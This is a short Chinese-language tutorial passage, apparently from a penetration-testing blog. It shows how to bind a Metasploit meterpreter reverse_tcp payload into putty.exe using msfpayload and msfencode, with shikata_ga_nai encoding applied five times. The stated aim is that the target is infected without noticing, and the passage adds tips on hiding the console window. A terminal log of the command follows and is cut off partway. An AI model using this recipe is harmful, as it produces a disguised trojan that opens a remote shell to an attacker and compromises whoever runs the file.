绑定payload 至一个可执行文件,让目标不知不觉间中招,以putty.exe 为例:
1 |
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.105 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5 |
假如选择一个GUI 界面的程序作为绑定目标并且不使用-k 选项,则目标执行此程序的时候不会弹出cmd 窗口,-k 选项的作用是payload 独立于模板软件的进程运行。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
root@Dis9Team:~# cd /pentest/exploits/framework root@Dis9Team:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.105 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5 [*] x86/shikata_g |